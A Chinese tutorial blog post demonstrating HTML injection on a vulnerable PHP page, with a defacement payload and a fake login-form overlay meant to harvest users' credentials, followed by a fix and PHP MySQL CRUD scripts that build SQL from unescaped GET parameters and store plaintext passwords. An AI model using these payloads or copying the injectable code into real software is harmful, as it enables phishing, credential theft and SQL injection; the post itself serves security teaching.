IT辅导娱乐网| 蜘蛛地图| 所有文章|
html注入以及php对数据库的增删改查 - IT辅导
  • 首页
  • IT技术 IT辅导资源网设计图
    • DVWA靶场
    • sqli-lab靶场
  • 源码基地
  • 软件分享 IT辅导资源网设计图
    • 辅助软件
  • emlog教程
  • 白嫖活动
  • 网络技巧 IT辅导资源网设计图
    • seo教程
  • 编程教程
  • 值得看一看 IT辅导资源网设计图
    • 值得听一听
    • 读懂世界
    • 活动线报
  • 更多功能 IT辅导资源网设计图
    • 在线投稿
    • 公告动态
    • 广告合作
    • 匿名投稿


登录后,享受更多优质服务哦
IT辅导资源网站长qq头像
欢迎回来,可爱的会员!个人中心退出登录
导航菜单
  • 首页
  • IT技术
    • DVWA靶场
    • sqli-lab靶场
  • 源码基地
  • 软件分享
    • 辅助软件
  • emlog教程
  • 白嫖活动
  • 网络技巧
    • seo教程
  • 编程教程
  • 值得看一看
    • 值得听一听
    • 读懂世界
    • 活动线报
  • 更多功能
    • 在线投稿
    • 公告动态
    • 广告合作
    • 匿名投稿
PHP数据库html注入增删改查

html注入以及php对数据库的增删改查

2020/4/24 五年级扛把子  IT技术
html注入
<html>

   <head>

       <title>html注入</title>

	   <meta charset="utf-8">

   </head>

   <body>

       <form action="" method="get">

	      <input type="text" name="html">

	   <input type="submit" value="提交">

	   </form>

<?php

    if(@$_GET['html'])

	{

	    echo $_GET['html'];

	    //echo htmlspecialchars($_GET['html']);

	}

?>

</body>

</html>

效果输入的东西会返回到页面上

发现get方式提交
然后尝试输入<h1>123<h1>,发现解析了HTML代码
那么我们输入<table style="left:0px;top:0px;position:fixed;z-index:5000;position:absolute;width:100%;height:100%;background-color:black;"><tr><td><h1 style="color:white;z-index:6000;text-align:center;">hacked by 123</h1></td></tr></table>
伪造用户登录界面
<table style="left:0px;top:0px;position:fixed;z-index:5000;width:200%;background-color:white;"><tr><td><form action="http://127.0.0.1/login.php" method="post"> 账号 :<input type="text" name="username"><br>密码 :<input type="password" name="password"><br><input type="submit" value="登陆"></form></td></tr></table>
将用户输入的数据收集到自己数据库或记事本

修复(输入点或输出点)

htmlspecialchars($_GET['html']);

php对数据库的增删改查

查
<?php


     $link = mysqli_connect('127.0.0.1','root','root');

	 

	 if(!$link)

	 {

		 exit('数据库链接失败');

	 }

	 

	 mysqli_set_charset($link,'utf8');

	 

	 mysqli_select_db($link,'test');

	 

	 $sql = "select * from user";

	 

	 $res = mysqli_query($link,$sql);

	 

	 echo '<table width="600" border="1">';

	 

	    echo '<th>编号</th><th>用户名</th><th>密码</th><th>操作</th>';

		

	     while($result = mysqli_fetch_assoc($res))

		 {

              echo '<tr>';

			  

			       echo'<td>'.$result['id'].'</td>';

				   

				   echo'<td>'.$result['username'].'</td>';

				 

				   echo'<td>'.$result['password'].'</td>';

				   

				   echo '<td><a href="update.php?id='.$result['id'].'"

rel="external nofollow" >修改</a>

				   /<a href="del.php?id='.$result['id'].'"

rel="external nofollow" >删除</a></td>';

			  

			  echo '</tr>';

		 }

	 echo '<table/>';

	echo '<a href="insert.php"

rel="external nofollow" >添加</a>';

	 

	 mysqli_close($link);

删 del.php
<?php


   

	$id=$_GET['id'];

	

	$link = mysqli_connect('127.0.0.1','root','root');

	

	if(!$link)

	{

		exit('数据库链接失败');

	}

	

	mysqli_set_charset($link,'utf8');

	

	mysqli_select_db($link,'test');

	

	$sql = "delete from user where id=$id";

	

	$res = mysqli_query($link,$sql);

	

	//$result = mysqli_fetch_assoc($res);

	

//	var_dump($res);



     if($res  && mysqli_affected_rows($link))

	 {

		 echo '删除成功';

	 }

	 else

	 {

		 echo '删除失败';

	 }

	 

	 mysqli_close($link);

	
改 updata.php
<?php


   

	$id=$_GET['id'];

	

	$link = mysqli_connect('127.0.0.1','root','root');

	

	if(!$link)

	{

		exit('数据库链接失败');

	}

	

	mysqli_set_charset($link,'utf8');

	

	mysqli_select_db($link,'test');

	

	$sql = "select * from user where id=$id";

	

	$res = mysqli_query($link,$sql);

	

	$result = mysqli_fetch_assoc($res);

	//echo $id;

	

	//var_dump($result);

?>


<html>

     <form action="doupdate.php">

	         <input type="hidden" value="<?php echo $id; ?>" name="id">

	        编号:<input type="text" value="<?php echo $result['id']; ?>" name="id"><br/>

	       用户名:<input type="text" value="<?php echo $result['username']; ?>" name="username"><br/>

		   密码:<input type="text" value="<?php echo $result['password']; ?>" name="password"><br/>

		   <input type="submit" value="执行修改">

	 </form>

</html>

	

增 insert.php
<html>

     <form action="insert into.php">

	     用户名:<input type="text" name="username">

		 密码:<input type="text" name="password">

		 <input type="submit">

	 </form>

</html>

insert into.php
<?php


    $username=$_GET['username'];

	$password=$_GET['password'];

//	var_dump($_GET);

     $link =mysqli_connect('127.0.0.1','root','root');


     if(!$link)

	 {

		 exit('数据库链接失败');

	 }		 

	 

	 mysqli_set_charset($link,'utf8');

	 

	 mysqli_select_db($link,'test');

	 

	 $sql = "insert into user(username,password) values('$username','$password')";

	 

	 $res=mysqli_query($link,$sql);

	 $id=mysqli_insert_id($link);

	 //var_dump($res);

	 

	 if($res)

	 {

		 echo '修改成功';

	 }

	 else

	 {

		 echo '修改失败';

	 }

	 

	 mysqli_close($link);

	 

 点赞:0  打赏  分享  海报

  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫
结束语
温馨提醒:如有技术问题以及资源失效请联系站长 QQ89549822 进行反馈!!!
 您阅读本文耗时: 0小时02分35秒
热度:564° 发布时间:2020年4月24日

推荐:PHP数据库html注入增删改查

标题:html注入以及php对数据库的增删改查

链接: https://www.itfd.cn/post-339.html

版权:转载请注明来源于【IT辅导娱乐网】为原创

上一篇: php基础知识分享

下一篇: 支付宝当面付对接XUEIDC系统【教程】

作者头像 作者名称 作者性别
五年级扛把子
联系作者 作者主页

热门推荐

1 蓝鲸安全ctf打卡web篇----第一期
2 网页301重定向自动跳转代码汇总
3 PHP5秒盾防CC代码(网站通用代码)
4 LNMP安装ngx_lua_waf waf(web应用防火墙) 教程 教你开启WAF保护
5 DOS和PHP操作数据库-cookie、session简介
6 开头为0的md5值总结

评论列表

取消回复

  • 存档

    • 2020年9月(191)
    • 2020年8月(92)
    • 2020年7月(5)
    • 2020年6月(224)
    • 2020年5月(392)
    • 2020年4月(267)
    • 2020年3月(76)
    • 2019年3月(1)
    • 1970年1月(29)
  • 搜索

  • 热门文章

    • 神佑之路手游源码-附视频教程
    • 最新可用老王VPN2.22.15谷歌市场版,免费使用
    • 私藏的十个网站,不看后悔系列
    • 虚拟商品自动发货商城源码
    • 不吃苦、不奋斗,你要青春做什么?
  • 随机文章

      • emlog程序网站公告栏插件
        • 软件强制突破进好友QQ空间
          • “窃格瓦拉”出狱被网红公司集体蹲守签约 底线在哪?
            • 风水罗盘 忽悠装X必备神器!
              • 私藏的十个网站,不看后悔系列
    提示信息

    SQL语句执行错误: SELECT COUNT(*) AS total FROM emlog_twitter
    Table 'itfd.emlog_twitter' doesn't exist

    «点击返回